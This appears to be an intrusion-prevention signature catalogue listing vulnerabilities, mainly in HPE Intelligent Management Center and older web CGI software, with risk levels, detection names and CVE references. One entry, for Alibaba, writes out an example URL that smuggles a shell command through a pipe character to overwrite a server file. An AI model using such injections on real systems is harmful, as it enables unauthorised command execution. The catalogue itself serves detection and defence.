Improper validation of user-supplied parameters causes an SQL command injection vulnerability in HP Intelligent Management Center. A successful attack allows arbitrary commands to be executed on the target system.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection

References:

CVE-2017-5817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5817

HPE-Intelligent-Management-Center-Dbman-Restorezipfile-Command-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-942-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There exists a command injection vulnerability in HPE Intelligent Management Center. A remote attacker can use this to execute arbitrary commands on the affected system.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection

References:

CVE-2017-5821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5821

HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

Improper validation of user-sent commands causes a stack buffer overflow in HPE Intelligent Management Center. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow

References:

CVE-2017-8956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8956

HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

There has been reported a stack-based buffer overflow in the dbman component of HPE Intelligent Management Center. This vulnerability can be exploited by a remote, unautheticated attacker. Successful exploitation could result in arbitrary code execution.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115

References:

CVE-2018-7115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7115

HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-992-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Input Validation

Description:

Improper validation of HTTP requests causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code with system-level privileges without authentication.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection

References:

CVE-2017-12490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12490

HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1137-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Insufficient handling of the beanName request parameter in iccSelectCommand.xhtml causes an expression language injection vulnerability in HPE IMC. A successful exploit may allow an attacker to run arbitrary code on the target with system privileges.
Situation:	HTTP_CRL-HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection

HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-949-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

Improper parsing of SSID information in user-sent packets causes a stack buffer overflow vulnerability in HP Intelligent Management Center. A successful attack can allow arbitrary code to be run remotely on the target system without authentication.

Situation:

Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow

References:

CVE-2017-5806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5806

HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

Improper validation of opcode data causes a buffer overflow vulnerability in HP Intelligent Management Center. A successful attack allows unauthenticated remote code execution with system privileges.

Situation:

Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow

References:

CVE-2017-5805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5805

HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1017-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

A remote, unauthenticated attacker could exploit a directory traversal vulnerability in HPE Intelligent Management Center PLAT, which could lead arbitrary file deletion.

Situation:

HTTP_CS-HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal

References:

CVE-2017-12559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12559

HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in HPE Intelligent Management Center. Untrusted data is deserialized by perfAccessMgrServlet, which could lead to arbitrary code execution. An unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted packet to the target server.

Situation:

File-Binary_HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization

References:

CVE-2017-8962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8962

HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

An Expression Language injection vulnerability has been reported in HPE Intelligent Management Center. The vulnerability is due to insufficient validation of the beanName request parameter in perfSelectTask endpoint. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary code under the security context of the SYSTEM user.

Situation:

HTTP_CSR-HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection

References:

CVE-2019-5385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5385

HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1013-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Improper validation of HTTP request parameters causes a file upload vulnerability in HP Intelligent Management Center. A successful exploitation can allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload

References:

CVE-2017-8961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8961

HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1185-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There has been reported an expression language injection vulnerability in HPE Intelligent Management Center. Succesful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection

References:

CVE-2019-5387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5387

HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1142-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Insufficient validation of the pfdrid request parameter in primefaces endpoint causes an expression language injection vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to run code with system privileges.
Situation:	HTTP_CRL-HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection

HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-901-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Insecure deserialization of untrusted objects causes a vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to run arbitray code with system privileges on the target system.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization

References:

CVE-2017-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5792

HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There has been reported an expression Language injection vulnerability in HPE Intelligent Management Center. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection

References:

CVE-2019-11943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11943

HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1145-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Insecure deserialization of untrusted data by the TopoDebugServlet causes a vulnerability in HPE Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary code with on the target system with system privileges.
Situation:	File-Binary_HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization

HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-869-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There exists an authentication bypass vulnerability in HPE Intelligent Management Center.

Situation:

HTTP_CSU-HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass

References:

CVE-2017-5791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5791

HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There has been reported an expression language injection vulnerability in HPE Intelligent Management Center. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection

References:

CVE-2019-5386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5386

HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1017-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Situation:

HTTP_CS-HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization

References:

CVE-2017-12558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12558

HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-977-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Input Validation

Description:

Insufficient validation of the beanName parameter causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection

References:

CVE-2017-12526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12526

HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal

About this vulnerability:

A vulnerability in HPE Moonshot Provisioning Manager Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Moonshot Provisioning Manager Appliance

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in HPE Moonshot Provisioning Manager Appliance. This vulnerability exists due to missing input validation in the server_response.py script. The vulnerability can be exploited by a remote, unauthenticated attacker.

Situation:

HTTP_CRL-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
HTTPS_CS-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal

References:

CVE-2017-8977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8977

HPE-Network-Automation-Permissionfilter-Authentication-Bypass

About this vulnerability:

A vulnerability in HPE Network Automation

Risk:

High

First detected in:

sgpkg-ips-919-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Network Automation

Type:

Input Validation

Description:

There exists an authentication bypass vulnerability in HPE Network Automation. A directory traversal inside a specific URL can allow an unauthenticated attacker to bypass authentication making further attacks possible.

Situation:

HTTP_CSU-HPE-Network-Automation-Permissionfilter-Authentication-Bypass

References:

CVE-2017-5812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5812

HPE-Network-Automation-RPCServlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in HPE Network Automation

Risk:

High

First detected in:

sgpkg-ips-836-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HPE Network Automation

Type:

Malfunction

Description:

There exists an insecure deserialization vulnerability in RPCServlet of HPE Network Automation. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_HPE-Network-Automation-RPCServlet-Insecure-Deserialization

References:

CVE-2016-8511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8511

HPE-Network-Automation-SQL-Injection-Remote-Code-Execution

About this vulnerability:

HPE Network Automation SQL Injection Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-932-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Windows; Solaris

Software:

HPE Network Automation

Type:

SQL Injection

Description:

An SQL Injection Remote Code Execution vulnerability in HPE Network Automation that allows remote attackers to retrieve encryption keys and other information. This could further allow the attacker to send requests with crafted tk parameters CVE-2017-5811.

Situation:

HTTP_CSU-HPE-Network-Automation-SQL-Injection-Remote-Code-Execution

References:

CVE-2017-5810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5810

HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Operations Orchestration

Risk:

Moderate

First detected in:

sgpkg-ips-1022-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Operations Orchestration

Type:

Input Validation

Description:

An insecure deserialization vulnerability could be exploited by a remote, unauthenticated attacker to run arbitrary code execution in the context of the SYSTEM.

Situation:

HTTP_CS-HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization

References:

CVE-2017-8994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8994

HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Operations Orchestration

Risk:

Moderate

First detected in:

sgpkg-ips-986-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Operations Orchestration

Type:

Input Validation

Description:

Insecure serialization of user-sent Java objects causes a vulnerability in HPE Operations Orchestration. A successful attack allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.

Situation:

HTTP_CS-HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization

References:

CVE-2017-8994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8994

HPE-Operations-Orchestration-Insecure-Deserialization

About this vulnerability:

A vulnerability in HPE Operations Orchestration

Risk:

Moderate

First detected in:

sgpkg-ips-844-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Operations Orchestration

Type:

Input Validation

Description:

Insecure deserialization of untrusted client data results in a vulnerability in HPE Operations Orchestration. With a suitably crafted payload, an attacker can gain the ability to execute arbitrary code on the target system.

Situation:

HTTP_CS-HPE-Operations-Orchestration-Insecure-Deserialization

References:

CVE-2016-8519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8519

HPE-Smart-Storage-Administrator-Code-Execution

About this vulnerability:

A vulnerability in HPE Smart Storage Administrator

Risk:

Moderate

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE Smart Storage Administrator

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in HPE Smart Storage Administrator.

Situation:

HTTP_CRL-HPE-Smart-Storage-Administrator-Code-Execution

References:

CVE-2016-8523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8523

HPE-Systems-Insight-Manager-Amf-Deserialization-RCE

About this vulnerability:

A vulnerability in HPE Systems Insight Manager.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Windows

Software:

HPE Systems Insight Manager

Type:

Input Validation

Description:

A vulnerability in HPE Systems Insight Manager, version 3.2.2, which allows remote attackers to execute arbitrary code due to insufficient input validation during the deserialization process when a POST request is submitted to /simsearch/messagebroker/amfsecure.

Situation:

HTTP_CRL-HPE-Systems-Insight-Manager-Amf-Deserialization-RCE

References:

CVE-2020-7200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7200

HTML-Empty-Input-Tag

About this vulnerability:	HTML Input tag with no parameters
Risk:	Low
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	An input tag with no parameters can be generally considered useless HTML and may indicate attack related behaviour.
Situation:	File-Text_HTML-Empty-Input-Tag

HTML-In-HTTP-POST

About this vulnerability:	HTML was detected in a HTTP POST request
Risk:	Moderate
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	HTML was detected in a HTTP POST request. This is not necessarily malicious, but may be unwanted in some environments.
Situation:	HTTP_CS-HTML-In-HTTP-POST

HTML-Null-Character-Evasion-Method

About this vulnerability:	A HTML evasion method
Risk:	Low
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	There is an HTML evasion technique that consists of using an excessive number of null characters injected in the middle of an HTML tag. A typical web browser ignores these extra null characters, while a detection device might not.
Situation:	HTTP_SS-HTML-Null-Character-Evasion-Method File-Text_HTML-Null-Character-Evasion-Method

HTML-Script-Detector

About this vulnerability:	Dummy vulnerability for a fingerprint that detects HTML script blocks
Risk:	Low
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	Dummy vulnerability for a fingerprint that detects HTML script blocks.
Situation:	HTTP_SS-Encoded-Client-Side-Script File-Text_Encoded-Client-Side-Script

HTML-Tag-Detector

About this vulnerability:	Dummy vulnerability for a fingerprint that detects HTML tags
Risk:	Low
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Dummy vulnerability for a fingerprint that detects HTML tags.
Situation:	HTTP_HTML-Tag-Detector File-Text_HTML-Tag-Detector

HTran-Connection-Bouncer

About this vulnerability:	HTran Connection Bouncer
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	HTran Connection Bouncer is malicious tool that redirects network traffic.
Situation:	Generic_SS-HTran-Connection-Bouncer-Error-Message

HTTP-427BB-HTML-Injection

About this vulnerability:

HTML injection vulnerability in 427BB

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

427BB

Type:

Script Injection

Description:

427BB is PHP and MySQL forum for Unix-based operating systems. The software contains multiple remote HTML injection vulnerabilities. A remote attacker can exploit these cross-site vulnerabilities to execute scripts in the victim's Web browser when the injected page is viewed.

Situation:

HTTP_CSU-427BB-HTML-Injection

References:

CVE-2005-0629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0629

BID-12693
http://www.securityfocus.com/bid/12693

HTTP-A1stats-Cgi-File-Disclosure

About this vulnerability:

Directory traversal vulnerability in A1stats CGI scripts

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Drummond Miles A1Stats

Type:

Directory Traversal

Description:

Drummond Miles A1Stats versions downloaded before 24 April 2001 have a directory traversal vulnerability. This allows remote users to read arbitrary files from the server, and to overwrite files writable by the Web server with A1Stats output.

Situation:

HTTP_CSU-A1stats-Cgi-File-Disclosure

References:

CVE-2001-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0561

BID-2705
http://www.securityfocus.com/bid/2705

HTTP-Admbook-Php-Code-Execution

About this vulnerability:

Admbook php Code Execution Vulnerability

Risk:

High

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Admbook

Type:

Code Injection

Description:

Admbook is a free php-written guest book that has a php execution vulnerability. A remote attacker can inject php code into the "content-data.php" file and execute the code afterwards to compromise the target system.

Situation:

HTTP_CS-Admbook-Php-Code-Execution

References:

CVE-2006-0852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0852

BID-16753
http://www.securityfocus.com/bid/16753

OSVDB-23365
http://www.osvdb.org/23365

HTTP-Admentor-Admin-Asp-Vulnerability

About this vulnerability:

Admentor admin.asp vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Stefan Holmberg Admentor

Type:

Malfunction

Description:

Admentor has a vulnerability in its login process that allows any user to login as admin. An SQL query is constructed from the user input but the input is not filtered for special characters.

Situation:

HTTP_CRL-Admentor-Admin-Asp-Vulnerability

References:

CVE-2002-0308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0308

BID-4152
http://www.securityfocus.com/bid/4152

HTTP-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise

About this vulnerability:

Adobe Acrobat/Acrobat Reader buffer overflow via null byte in URL

Risk:

Moderate

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

Adobe Acrobat/Acrobat Reader's ActiveX component contains a buffer overflow vulnerability. If an existing pdf-file is requested from a web server with a null-byte and a long string appended after the filename, and the web server truncates the request at the null-byte, a buffer overflow takes place in Adobe's ActiveX component. As the web server truncates the request, it will find and return a valid pdf document. The ActiveX component still receives the complete string and overflows a buffer. Arbitrary code execution is possible, and the vulnerability can be triggered by following a malicious link with a vulnerable version of the ActiveX component installed.

Situation:

HTTP_CSU-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise

References:

CVE-2004-0629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0629

BID-10947
http://www.securityfocus.com/bid/10947

HTTP-Adobe-Acrobat-PDF-BOF

About this vulnerability:

Buffer Overflow in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-185-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Cross-site Scripting

Description:

There exists a buffer overflow vulnerability in Adobe Reader and Acrobat. The vulnerability is due to insufficient input validation in JavaScript function util.printf. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.

Situation:

HTTP_SS-Adobe-Acrobat-PDF-Formatstring
File-PDF_Adobe-Acrobat-PDF-Formatstring

References:

CVE-2008-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992

BID-30035
http://www.securityfocus.com/bid/30035

OSVDB-49520
http://www.osvdb.org/49520

HTTP-Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Adobe Acrobat Reader allows cross site scripting

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in the browser plugin included with Adobe Acrobat Reader. A crafted URI can be used to execute JavaScript code, which allows spoofing of the page origin.

Situation:

HTTP_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
File-Text_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting

References:

CVE-2007-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0045

BID-21858
http://www.securityfocus.com/bid/21858

HTTP-Adobe-Download-Manager-Buffer-Overflow

About this vulnerability:

Adobe Download Manager HTTP Reply Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Download Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the component responsible for parsing the AOM file format in the Adobe Download Manager application. A remote attacker can exploit this vulnerability to divert the process flow of the affected application to the injected code, causing arbitrary code execution in the context of the currently logged in user.

Situation:

HTTP_Adobe-Download-Manager-Buffer-Overflow
File-TextId_Adobe-Download-Manager-Buffer-Overflow

References:

CVE-2006-5856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5856

BID-21453
http://www.securityfocus.com/bid/21453

HTTP-Adobe-RoboHelp-Server-SQL-Injection

About this vulnerability:

SQL injection vulnerability in Adobe RoboHelp Server

Risk:

Moderate

First detected in:

sgpkg-ips-159-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Systems RoboHelp Server

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in Adobe RoboHelp Server. An authenticated attacker can exploit this vulnerability by providing malicious values to specific arguments of the Help_Errors.asp and Top_Unanswered_Customer_Questions.asp pages. A successful exploit leads to disclosure of sensitive information, unauthorized data alternation, and loss of data.

Situation:

HTTP_CRL-Adobe-RoboHelp-Server-SQL-Injection

References:

CVE-2008-2991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2991

BID-30137
http://www.securityfocus.com/bid/30137

OSVDB-46867
http://www.osvdb.org/46867

HTTP-Aglimpse-Cgi-System-Compromise

About this vulnerability:

Arbitrary command-execution flaw in WebGlimpses aglimpse script

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGlimpse

Type:

Metacharacter Injection

Description:

The aglimpse script in WebGlimpse does not filter the pipe metacharacter from its input. This allows remote attackers to execute arbitrary commands on the system by sending a suitable argument to agimple.

Situation:

HTTP_CRL-Aglimpse-Cgi-System-Compromise

References:

CVE-1999-0147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0147

BID-2026
http://www.securityfocus.com/bid/2026

HTTP-Aktivate-Catgy-Cross-Site

About this vulnerability:

Aktivates catgy.cgi cross site vulnerability

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Aktivate

Type:

Malfunction

Description:

Aktivate is vulnerable to cross-site scripting. Remote users can construct a link containing arbitrary script code to Aktivate, and when a user browses the link the script code will be executed. Attackers cam exploit the vulnerability to hijack legimate users' sessions.

References:

CVE-2001-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1212

BID-3714
http://www.securityfocus.com/bid/3714

HTTP-Alibaba-Remote-Command-Execution-Vulnerability

About this vulnerability:

Alibaba remote command execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Software Manufaktur Alibaba

Type:

Metacharacter

Description:

By inserting a pipe character after the name of the cgi it is possible to run arbitrary commands on the remote server. Example: http://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.

Situation:

HTTP_CS-Alibaba-DOS
HTTP_CRL-Alibaba-Command-Execution
HTTP_CRL-Alibaba-Command-Execution-2

References:

CVE-1999-0885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0885

BID-770
http://www.securityfocus.com/bid/770

HTTP-Allaire-ColdFusion-cfcache.map-Disclosure

